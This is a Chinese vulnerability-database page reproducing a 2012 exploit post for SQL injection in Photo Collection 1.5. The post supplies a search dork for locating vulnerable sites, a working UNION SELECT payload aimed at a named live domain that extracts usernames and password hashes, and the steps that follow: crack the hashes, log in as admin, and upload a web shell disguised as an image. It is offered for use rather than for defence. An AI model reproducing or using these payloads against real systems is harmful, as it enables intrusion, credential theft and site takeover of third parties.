Photo Collection 1.5 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047286 漏洞类型
发布时间 2012-06-13 更新时间 2012-06-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060140
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-------------------- IN The NAme OF God --------------------

-====Photo collection Remote Sql Injection Vulnerability====-

# Exploit Title: Photo collection Remote Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack , 7 , Redhat
# Version : 1.5
# MAil : No0pm@yahoo.com
-====Dork====-

inurl:index.php?Blog=*&user_id=

intext: Copyright (c) 2010-2012 by photo collection. All rights reserved!

-====Exploit====-

http://Site.C0M/index.php?Blog=11&user_id=[Sqli]

-====Example====-

http://www.dakghor.com/index.php?Blog=11&user_id=-9999+union+select+group_concat%28user_name,0x3a,user_password%29+from+be_users--

-====information====-

Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/

Admin Page ~~~~~~~~~> Front PAge With Email And PAssword

Login To panel :D 

Click <<--- Add Profile Picture or Add Picture  -----Upload She3ll~~~> Sh3ll.jpg 0r Sh3ll.php.Jpg

And Load From  http://www.xxxxx.com/images/users/Sh3ll.jpg

-====Tnx To====-

Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz

MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG